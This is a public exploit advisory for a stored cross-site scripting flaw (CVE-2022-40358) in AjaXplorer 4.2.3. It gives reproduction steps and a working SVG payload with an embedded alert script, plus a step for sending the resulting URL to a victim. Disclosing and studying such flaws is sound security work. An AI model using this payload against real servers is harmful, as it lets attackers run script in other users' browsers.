AjaXplorer 4.2.3 - Stored Cross-Site Scripting (XSS)

2022.09.22
Risk: Low
Local: No
Remote: Yes
CWE: N/A

# Exploit Title: AjaXplorer 4.2.3 - Stored Cross-Site Scripting (XSS) # Exploit Author: Scott Sturrock 'ssturrock -at- protonmail -dot- com' # Vendor Homepage: http://www.ajaxplorer.info/ # Software Link: https://sourceforge.net/projects/ajaxplorer/files/ajaxplorer/stable-channel/4.2.3/ # Version: 4.2.3 # Tested on: Linux, Windows # CVE : CVE-2022-40358 An issue was discovered in AjaXplorer 4.2.3, allows attackers to cause cross site scripting vulnerabilities via a crafted svg file upload. Steps to reproduce: 1.Right click > Create a new file > name file xss.svg 2.Right click on file > open in Source Editor 3.Copy paste below Payload and click save <?xml version="1.0" standalone="no"?><svg width="1000" height="1000" version="1.1" xmlns="http://www.w3.org/2000/svg"><circle cx="50" cy="50" r="25" stroke="red" fill="transparent" stroke-width="50"/><script type="text/javascript">alert('XSS');</script></svg> 4.Right click file and open in external window for payload URL to send to victim

References:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40358


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top